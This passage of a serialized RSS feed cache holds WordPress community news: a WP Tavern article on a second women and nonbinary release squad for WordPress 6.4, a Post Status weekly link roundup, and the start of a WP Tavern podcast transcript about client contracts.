Squad\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143582\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"https://wptavern.com/wordpress-gears-up-for-2nd-women-and-nonbinary-release-squad\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3046:\"<p>WordPress Executive Director Josepha Haden Chomphosy is <a href=\"https://make.wordpress.org/core/2023/04/07/preparing-for-the-next-women-nonbinary-release-squad/\">coordinating a second women and nonbinary release squad</a> for the 6.4 release, which is anticipated to land in <a href=\"https://wordpress.org/about/roadmap/\">November 2023</a>. In 2020, <a href=\"https://wptavern.com/wordpress-5-6-simone-includes-new-twenty-twenty-one-theme-and-improved-editor\">WordPress 5.6 &#8220;Simone&#8221;</a> was led by an all-women and non-binary identifying release squad, a first in WordPress&#8217; history, and Haden Chomphosy is proposing the project go for it again.</p>\n\n\n\n<p>&#8220;Having a release squad comprised of folx we don’t typically see in technology also has a goal of increasing the number of underrepresented people who have experience maintaining, managing, and shipping software in an open source project,&#8221; Haden Chomphosy said. &#8220;All contributions to the release and release process are welcome.&#8221;</p>\n\n\n\n<p>WordPress 6.3, which is targeted for a mid-July release, will give prospective 6.4 squad members the opportunity to shadow more experienced contributors and gain new skills by working with mentors and assisting with the release. She is calling for mentors to join in preparing this new round of leaders. The process is a several-months long commitment that gives contributors a head start on understanding their roles in the squad, though it is not required for participation in the 6.4 release.</p>\n\n\n\n<p>Haden Chomphosy emphasized that anyone will be able to contribute to the release but the leaders in the 6.4 squad will be limited to this specific group.</p>\n\n\n\n<p>&#8220;I short-hand the release to &#8216;women and nonbinary&#8217; for easy referencing in our day-to-day collaboration, but the release squad will be open to anyone who identifies as a woman, nonbinary, or gender-expansive,&#8221; she said. &#8220;All contributions are welcome as always, regardless of how you identify or what groups you feel part of.&#8221;</p>\n\n\n\n<p>WordPress has gained valuable new contributors and leaders from this initiative in the past, including 6.2 Core Tech Co-Leads Tonya Mork.</p>\n\n\n\n<p>&#8220;Before joining the 5.6 Release Squad, I had <em>not</em> contributed to the project,&#8221; Mork said. &#8220;I had no idea how the release cycle worked or where to start. Yup, I was a contributing noob. But with mentoring, I was <em>well supported</em> in my onboarding. <em>And you will be too! The experience was and still is incredible!</em>&#8220;</p>\n\n\n\n<p>Based on the response to Haden Chomphosy&#8217;s proposal, there should be no shortage of contributors and volunteers available to help with the women and nonbinary 6.4 release squad. She is requesting anyone who wants to be part of the squad or help as a mentor leading up to the release to leave a comment on the <a href=\"https://make.wordpress.org/core/2023/04/07/preparing-for-the-next-women-nonbinary-release-squad/\">post</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Apr 2023 21:02:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Post Status: Women &amp; Nonbinary Release • WP-CLI 2.8.0 • Redesign Update • Build Block Theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=148909\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"https://poststatus.com/women-nonbinary-release-wp-cli-2-8-0-redesign-update-build-block-theme/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:17442:\"<h2 class=\"wp-block-heading\" id=\"h-this-week-at-wordpress-org-april-3-2023\">This Week at WordPress.org (April 3, 2023)</h2>\n\n\n<div class=\"has-background has-theme-palette-8-background-color wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">Sign up soon to mentor and be a part of the upcoming women and nonbinary release squad. Join the Test team in building a block theme. WP-CLI 2.8.0 is coming soon with PHP 8.2 compatibility. Get the latest updates on the WordPress.org redesign.  </p></div>\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-kadence-infobox kt-info-box_94d1bd-77\"><div class=\"kt-blocks-info-box-link-wrap kt-blocks-info-box-media-align-left kt-info-halign-left\"><div class=\"kt-blocks-info-box-media-container\"><div class=\"kt-blocks-info-box-media kt-info-media-animate-none\"><div class=\"kadence-info-box-icon-container kt-info-icon-animate-none\"><div class=\"kadence-info-box-icon-inner-container\"><span class=\"kb-svg-icon-wrap kb-svg-icon-fas_paint-brush kt-info-svg-icon\"></span></div></div></div></div><div class=\"kt-infobox-textcontent\"><h2 class=\"kt-blocks-info-box-title\">Women and Nonbinary Release Squad, WP-CLI 2.8.0 Release, Redesign Update</h2><p class=\"kt-blocks-info-box-text\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f9b8-1f3fb-200d-2640-fe0f.png\" alt=\"🦸🏻‍♀️\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/core/2023/04/07/preparing-for-the-next-women-nonbinary-release-squad/\">Preparing for the Next Women &amp; Nonbinary Release Squad</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f477-1f3fe.png\" alt=\"👷🏾\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/test/2023/03/29/fse-program-exploration-build-a-block-theme/\">FSE Program Exploration: Build a block theme</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f7e6.png\" alt=\"🟦\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Proposal: The Interactivity API – A better developer experience in building interactive blocks</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f469-1f3fb-200d-1f4bb.png\" alt=\"👩🏻‍💻\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/cli/2023/04/05/wp-cli-v2-8-0-release-date/\">WP-CLI v2.8.0 release date</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f58c.png\" alt=\"🖌\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/meta/2023/04/10/wordpress-org-redesign-update-2/\">WordPress.org Redesign Update</a></p></div></div></div>\n\n\n\n<div class=\"wp-block-kadence-spacer aligncenter kt-block-spacer-_b57166-6e\"><div class=\"kt-block-spacer kt-block-spacer-halign-center\"><hr class=\"kt-divider\" /></div></div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-news\"><a href=\"https://wordpress.org/news\">News</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.org/news/2023/04/episode-53-a-look-at-wordpress-6-2-dolphy/\">WP Briefing: Episode 53: A Look at WordPress 6.2 “Dolphy”</a></li>\n</ul>\n\n\n\n<div class=\"wp-block-kadence-spacer aligncenter kt-block-spacer-_8f6276-eb\"><div class=\"kt-block-spacer kt-block-spacer-halign-center\"><hr class=\"kt-divider\" /></div></div>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-4\">\n<div class=\"wp-block-column is-layout-flow\">\n<h2 class=\"wp-block-heading\" id=\"h-community\"><a href=\"https://make.wordpress.org/community\">Community</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/community/2023/04/07/its-time-to-plan-your-wp20-anniversary-celebration/\">It’s Time to Plan Your WP20 Anniversary Celebration!!</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/community/2023/04/06/personalised-coupon-codes-for-wordcamps/\">Personalised Coupon Codes for WordCamps</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-core\"><a href=\"https://make.wordpress.org/core\">Core</a> </h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/04/10/a-week-in-core-april-10-2023/\">A Week in Core – April 10, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/07/preparing-for-the-next-women-nonbinary-release-squad/\">Preparing for the Next Women &amp; Nonbinary Release Squad</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/03/preferred-languages-help-test-the-latest-version/\">Preferred Languages: Help test the latest version</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Proposal: The Interactivity API – A better developer experience in building interactive blocks</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-developer-blog\"><a href=\"https://developer.wordpress.org/news/\">Developer Blog</a></h3>\n\n\n\n<ul>\n<li><a href=\"https://developer.wordpress.org/news/2023/04/whats-new-for-developers-april-2023/\">What’s new for developers? (April 2023)</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-meetings\">Meetings</h3>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/04/12/editor-chat-summary-wednesday-12th-april-2023/\">Editor chat summary: Wednesday, 12th April 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/11/dev-chat-agenda-april-12-2023/\">Dev Chat agenda, April 12, 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-design\"><a href=\"https://make.wordpress.org/design\">Design</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/design/2023/03/30/why-jazz/\">Why Jazz?</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-docs\"><a href=\"https://make.wordpress.org/docs\">Docs</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/docs/2023/04/11/summary-for-docs-team-meeting-april-4-2023/\">Summary for Docs Team meeting, April 4, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/10/documentation-team-update-april-10-2023/\">Documentation Team Update – April 10, 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-hosting\"><a href=\"https://make.wordpress.org/hosting\">Hosting</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/hosting/2023/04/11/hosting-team-meeting-agenda-2023-04-12/\">Hosting Team meeting agenda 2023-04-12</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-marketing\"><a href=\"https://make.wordpress.org/marketing\">Marketing</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/marketing/2023/04/11/notes-global-marketing-team-meeting-4-april-2023/\">Notes: Global Marketing Team meeting, 4 April 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-meta\"><a href=\"https://make.wordpress.org/meta\">Meta</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/meta/2023/04/10/wordpress-org-redesign-update-2/\">WordPress.org Redesign Update</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-mobile\"><a href=\"https://make.wordpress.org/mobile\">Mobile</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/mobile/2023/04/11/contribute-to-the-future-of-the-wordpress-app/\">Contribute to the Future of the WordPress App</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/07/mobile-team-update-april-6th-2/\">Mobile Team Update – April 6th</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-openverse\"><a href=\"https://make.wordpress.org/openverse\">Openverse</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/openverse/2023/04/11/new-repository-for-storing-sensitive-terms/\">New repository for storing sensitive terms</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/openverse/2023/04/11/community-meeting-recap-2023-04-11/\">Community Meeting Recap (2023-04-11)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/openverse/2023/04/10/last-week-openverse-2023-04-03-2023-04-10/\">A week in Openverse: 2023-04-03 – 2023-04-10</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-performance\"><a href=\"https://make.wordpress.org/performance/\">Performance</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/04/11/performance-chat-summary-11-april-2023/\">Performance Chat Summary: 11 April 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-plugins\"><a href=\"https://make.wordpress.org/plugins\">Plugins</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/plugins/2023/03/21/use-of-code-generators-must-remain-gpl-compatible/\">Use of Code Generators Must Remain GPL Compatible</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/plugins/2023/03/10/advance-notice-of-retirement/\">Advance Notice of Retirement</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/11/plugin-team-status-april-10-2023/\">Plugin Team Status: April 10, 2023</a></li>\n</ul>\n</div>\n\n\n\n<div class=\"wp-block-column is-layout-flow\">\n<h2 class=\"wp-block-heading\" id=\"h-polyglots\"><a href=\"https://make.wordpress.org/polyglots\">Polyglots</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/polyglots/2023/04/12/agenda-weekly-polyglots-chat-april-12-2023-1300-utc/\">Agenda: Weekly Polyglots Chat – April 12, 2023 (13:00 UTC)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/polyglots/2023/04/11/polyglots-outreach-effort-retrospective/\">Polyglots outreach effort retrospective</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-project\">Project</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/project/2023/02/06/proposal-creating-a-wordpress-contributor-mentorship-program/\">Proposal: Creating a WordPress Contributor Mentorship Program</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/project/2023/01/27/discussion-ending-the-eternal-september/\">Discussion: Ending the Eternal September</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-support\"><a href=\"https://make.wordpress.org/support\">Support</a></h2>\n\n\n\n<ul>\n<li> <a href=\"https://make.wordpress.org/support/2023/03/support-ticket-triage-session-april-5th-2023-at-1600-utc/\">Support ticket triage session – April 5th 2023 at 16:00 UTC&nbsp;</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-test\"><a href=\"https://make.wordpress.org/test\">Test</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/test/2023/04/11/test-chat-summary-11-april-2023/\">Test Chat Summary: 11 April 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/test/2023/04/04/hallway-hangout-lets-chat-about-moving-to-the-site-editor/\">Hallway Hangout: Let’s chat about Moving to the Site Editor</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/test/2023/03/29/fse-program-exploration-build-a-block-theme/\">FSE Program Exploration: Build a block theme</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/10/test-team-update-10-april-2023/\">Test Team Update: 10 April 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-theme\">Theme</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/themes/2023/04/12/themes-team-meeting-notes-april-11-2023/\">Themes Team Meeting Notes – April 11, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/themes/2023/04/04/theme-handbook-overhaul-proposal/\">Theme Handbook Overhaul Proposal</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/11/themes-team-update-april-11-2023/\">Themes team update April 11, 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-training\"><a href=\"https://make.wordpress.org/training\">Training</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/training/2023/04/11/training-team-meeting-recap-for-april-4-2023/\">Training Team Meeting Recap for April 4, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/training/2023/04/05/proposal-creating-learning-pathways-for-learn-wordpress/\">Proposal: Creating Learning Pathways for Learn WordPress</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/training/2023/03/29/introduction-to-wordpress-development-syllabus/\">Introduction to WordPress Development syllabus</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-lesson-plans\"><a href=\"https://learn.wordpress.org/lesson-plans\">Lesson Plans</a></h3>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/lesson-plan/ta-pages-vs-posts/\">பக்கங்கள் Vs. இடுகைகள்</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-tutorials\"><a href=\"https://learn.wordpress.org/tutorials\">Tutorials</a></h3>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/tutorial/adding-a-sticky-header-or-banner/\">Adding a sticky header or banner</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/tutorial/extending-wordpress-common-security-vulnerabilities/\">Extending WordPress: common security vulnerabilities</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-online-workshops\">Online Workshops</h3>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/?meeting=a-beginners-guide-to-setting-up-a-basic-website-website-design\">A Beginner’s Guide to Setting Up a Basic Website: Website Design</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=a-beginners-guide-to-setting-up-a-basic-website-content-planning\">A Beginner’s Guide to Setting Up a Basic Website: Content Planning</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=becoming-a-better-developer\">Becoming a Better Developer</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=building-a-page-with-only-patterns\">Building a page with only patterns</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=lets-code-creating-a-wordpress-multisite-network\">Let’s code: creating a WordPress multisite network</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=community-sharing-favorite-themes\">Community Sharing: Favorite Themes</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-courses\"><a href=\"https://learn.wordpress.org/courses\">Courses</a></h3>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/course/converting-a-shortcode-to-a-block/\">Converting a Shortcode to a Block</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-wp-cli\">WP-CLI</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/cli/2023/04/05/wp-cli-v2-8-0-release-date/\">WP-CLI v2.8.0 release date</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-wptv\">WPTV</h2>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.tv/category/year/2022/\">Latest WordPress TV videos</a></li>\n</ul>\n</div>\n</div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-related-news\">Related News:</h2>\n\n\n\n<ul>\n<li><a href=\"https://www.php.net/archive/2023.php#2023-02-14-2\">PHP 8.2.4 Released!</a></li>\n\n\n\n<li><a href=\"https://www.php.net/archive/2023.php#2023-03-16-1\">PHP 8.1.17 Released!</a></li>\n\n\n\n<li><a href=\"https://262.ecma-international.org/13.0/\">TC39</a></li>\n\n\n\n<li><a href=\"https://github.com/composer/composer/releases/tag/2.5.5\">Composer 2.5.5</a></li>\n</ul>\n\n\n\n<p class=\"has-theme-palette-7-background-color has-background\">Thanks for reading our WP dot .org roundup! Each week we are highlighting the news and discussions coming from the good folks making WordPress possible. If you or your company create products or services that use WordPress, you need to be engaged with them and their work. Be sure to share this resource with your product and project managers. <br /><br /><strong>Are you interested in giving back and contributing your time and skills to WordPress.org?</strong> <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f64f.png\" alt=\"🙏\" class=\"wp-smiley\" /> <a href=\"https://wordpress.org/support/article/contributing-to-wordpress/\">Start Here ›</a><br /><br /><strong>Get our weekly WordPress community news digest</strong> — Post Status&#8217; <a href=\"https://poststatus.com/news/week-in-review/\">Week in Review</a> — covering the WP/Woo news plus significant writing and podcasts. It&#8217;s also available in <a href=\"https://poststatus.com/newsletter\">our newsletter</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f48c.png\" alt=\"💌\" class=\"wp-smiley\" /></p>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile has-background\"><a href=\"https://poststatus.com/\"><img src=\"https://poststatus.com/wp-content/uploads/2021/09/vertical-post-status-logo-250.png\" alt=\"Post Status\" class=\"wp-image-85823 size-full\" /></a><div class=\"wp-block-media-text__content\">\n<p class=\"has-text-align-left has-normal-font-size\" id=\"h-get-ready-for-remote-work\">You — and <a href=\"https://poststatus.com/#Agency\">your whole team</a> can <a href=\"https://poststatus.com/#choose-membership\">Join Post Status</a> too!</p>\n\n\n\n<p class=\"has-text-align-left has-small-font-size\"><strong>Build your network. Learn with others. Find your next job — or your next hire.</strong> Read the <strong>Post Status</strong> <a href=\"https://poststatus.com/newsletter/\">newsletter</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/2709.png\" alt=\"✉\" class=\"wp-smiley\" /> Listen to <a href=\"https://poststatus.com/podcasts/\">podcasts</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f399.png\" alt=\"🎙\" class=\"wp-smiley\" /> Follow <a href=\"https://twitter.com/post_status/\">@Post_Status</a> <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f426.png\" alt=\"🐦\" class=\"wp-smiley\" /> and <a href=\"https://www.linkedin.com/company/post-status-llc/\">LinkedIn</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f4bc.png\" alt=\"💼\" class=\"wp-smiley\" /></p>\n</div></div>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Apr 2023 19:17:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Courtney Robertson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"WPTavern: #71 – Nathan Ingram on How To Manage Contracts With Your WordPress Clients\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=143522\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://wptavern.com/podcast/71-nathan-ingram-on-how-to-manage-contracts-with-your-wordpress-clients\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:50678:\"Transcription<div>\n<p>[00:00:00] Nathan Wrigley: Welcome to the Jukebox podcast from WP Tavern. My name is Nathan Wrigley. Jukebox is a podcast which is dedicated to all things WordPress. The people, the events, the plugins, the blocks, the themes, and in this case how to manage your website client contracts.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast player of choice, or by going to WPTavern.com forward slash feed forward slash podcast. And you can copy that URL into most podcast players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the show, I&#8217;m very keen to hear from you and hopefully get you or your idea on the podcast as soon as possible. Head over to WPTavern.com forward slash contact forward slash jukebox, and use the form there.</p>\n\n\n\n<p>So on the podcast today, we have Nathan Ingram. Nathan is the host at iThemes Training, where he teaches WordPress and business development topics via live webinar. Based in Birmingham, Alabama, he has been working with clients to build websites since 1995.</p>\n\n\n\n<p>He&#8217;s also the creator of MonsterContracts, which helps WordPress professionals create contracts for their client work.</p>\n\n\n\n<p>If you&#8217;ve worked directly with clients, then you&#8217;ll know that things don&#8217;t always go according to plan. Assets might not be delivered on time. The client does not respond to your emails. The expectations of the client begins to creep away from the original proposal.</p>\n\n\n\n<p>Whilst there&#8217;s unlikely to be a perfect system to ensure that all projects run according to the plan, you can protect yourself from some of the worst aspects. And for this, you may need a contract.</p>\n\n\n\n<p>Nathan is on the podcast today to talk about why he thinks contracts are an essential part of any client facing WordPress work.</p>\n\n\n\n<p>We begin by talking about how the contract is designed as a tool to bring clarity to both parties. You, the website builder, can set out the constraints within which you work and the client can understand what they can, and cannot, expect from you. Nathan thinks that setting these expectations before the project begins leads to fewer problems later on.</p>\n\n\n\n<p>We talk about the fact that contracts don&#8217;t need to contain overly complex legal language, but they do need to be checked by a qualified legal professional before they&#8217;re deployed.</p>\n\n\n\n<p>Nathan also explains how he&#8217;s refined his contract over the years, tweaking the wording and the structure, depending upon the project at hand.</p>\n\n\n\n<p>We then get into what you can realistically do should your client breach the contract. Are you able to turn off their website, or withhold work that you&#8217;ve completed? Nathan&#8217;s not really in favour of sending in the lawyers as soon as something goes wrong. Rather trying to resolve any conflict through better communication.</p>\n\n\n\n<p>It&#8217;s an interesting conversation, which makes contracts seem less adversarial and more about ensuring that your WordPress website projects run as smoothly as possible.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all of the links in the show notes by heading over to WPTavern.com forward slash podcast, where you&#8217;ll find all the other episodes as well.</p>\n\n\n\n<p>And so without further delay, I bring you Nathan Ingram.</p>\n\n\n\n<p>I am joined on the podcast by Nathan Ingram. Hello, Nathan.</p>\n\n\n\n<p>[00:04:07] Nathan Ingram: Hey Nathan, how are you?</p>\n\n\n\n<p>[00:04:08] Nathan Wrigley: That&#8217;s strange. I&#8217;ve not had that before. Two Nathan&#8217;s on the podcast today. Very different levels of experience in the subject that we&#8217;re going to be talking about. Nathan Ingram is here today and he&#8217;s going to be talking to us about the legal aspects of hiring clients.</p>\n\n\n\n<p>You might describe it in one word as contracts, I guess. And there&#8217;s a whole treasure trove of things that we&#8217;re going to unpack there. But before we do that, Nathan, if anybody hasn&#8217;t heard of you before and hasn&#8217;t seen the things that you are doing online, would you just spend a few minutes introducing yourself? You can go back as far as you like but, give us yourself in the WordPress context.</p>\n\n\n\n<p>[00:04:44] Nathan Ingram: Yeah, sure. So I&#8217;ve been working with WordPress exclusively since right around 2010. I run a small agency down in Birmingham, Alabama. I&#8217;ve been working with clients since 1995. So I&#8217;ve been around the webspace for quite a while. I also am the host at iThemes Training. So we do live training webinars three days a week through iThemes. And then I also do some business coaching, and I have a product called MonsterContracts.</p>\n\n\n\n<p>[00:05:08] Nathan Wrigley: Tell us about the iThemes thing for a minute, because I know you do trainings over there. How did that all come about? Was it like a happy coincidence that you ended up doing that? Were you making content, training content, elsewhere that got you into that position?</p>\n\n\n\n<p>[00:05:22] Nathan Ingram: No goodness. So it&#8217;s really an interesting story and we could take a whole , a whole episode on how do people find their way in the WordPress community? So for me, iThemes was actually iThemes training at that time. Early on it was called webdesign.com. 